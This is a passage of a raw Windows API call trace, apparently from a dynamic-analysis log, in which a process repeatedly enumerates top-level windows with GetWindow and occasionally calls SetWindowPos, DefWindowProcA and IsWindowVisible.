0x10162 [0057.472] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.472] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.472] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.473] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.473] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.473] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.473] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.473] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.473] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.473] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.473] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.473] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.473] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.473] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.473] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.473] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.473] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.473] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.473] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.473] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.473] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.473] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.473] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.473] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.473] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.473] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.473] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.473] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.474] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.474] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.474] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.474] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.474] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.474] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.474] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.474] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.474] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.474] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.474] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.474] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.474] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.474] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.474] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.474] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.474] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.474] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.474] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.474] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.474] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.474] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.474] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.474] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.475] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.475] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.475] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.475] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.475] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.475] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.475] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.475] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.475] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.475] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.475] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.475] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.475] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.475] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.475] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.475] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.475] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.475] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.475] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.476] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.476] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.476] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.476] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.476] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.476] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.476] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.476] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.476] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.476] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.476] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.476] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.476] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.476] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.476] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.476] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.476] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.476] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.476] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.476] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.476] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.476] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.476] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.476] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.476] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.476] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.476] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.476] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.476] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.476] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.476] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.476] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.477] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.477] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.477] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.477] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.477] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.477] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.477] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.477] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.477] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.477] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.477] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.477] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.477] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.477] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.477] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.477] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.477] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.477] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.477] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.477] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.477] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.477] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.477] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.477] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.477] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.477] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.477] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.477] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.477] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.477] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.477] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.478] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.478] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.478] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.478] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.478] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.478] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.478] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.478] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.478] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.478] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.478] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.478] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.478] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.478] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.478] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.478] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.478] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.478] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.478] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.478] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.478] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.478] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.478] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.478] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.478] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.478] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.478] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.478] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.478] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.478] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.478] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.479] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.479] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.479] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.479] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.479] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.479] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.479] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.479] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.479] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.479] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.479] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.479] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.479] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.479] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.479] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.479] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.479] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.479] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.479] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.479] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.479] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.479] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.479] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.479] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.479] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.479] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.479] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.479] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.479] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.479] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.480] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.480] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.480] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.480] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.480] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.480] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.480] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.480] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.480] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.480] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.480] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.480] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.480] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.480] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.480] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.480] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.480] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.480] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.480] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.480] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.480] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.480] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.480] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.480] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.480] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.480] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.480] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.480] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.480] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.481] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.481] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.481] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.481] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.481] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.481] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.481] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.481] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.481] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.481] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.481] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.481] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.481] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.481] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.481] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.481] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.481] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.481] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.481] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.481] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.481] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.481] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.481] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.481] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.481] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.482] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.482] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.482] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.482] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.482] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.482] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.482] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.482] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.482] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.482] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.482] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.482] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.482] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.482] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.482] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.482] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.482] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.482] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.482] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.482] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.482] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.482] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.482] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.482] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.483] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.483] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.483] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.483] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.483] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.483] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.483] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.483] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.483] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.483] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.483] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.483] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.483] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.483] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.483] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.483] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.483] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.483] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.483] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.483] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.483] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.483] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.483] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.483] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.483] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.484] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.484] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.484] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.484] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.484] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.484] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.484] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.484] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.484] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.484] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.484] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.484] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.484] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.484] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.484] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.484] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.484] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.484] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.484] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.484] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.484] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.484] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.484] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.484] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.485] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.485] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.485] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.485] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.485] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.485] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.485] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.485] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.485] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.485] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.485] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.485] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.485] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.485] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.485] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.485] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.485] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.485] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.485] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.485] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.485] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.485] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.485] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.485] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.485] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.485] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.485] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.485] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.486] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.486] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.486] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.486] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.486] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.486] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.486] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.486] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.486] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.486] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.486] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.486] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.486] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.486] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.486] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.486] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.486] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.486] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.486] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.486] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.486] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.486] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.486] GetWindow (hWnd=0x1017c, 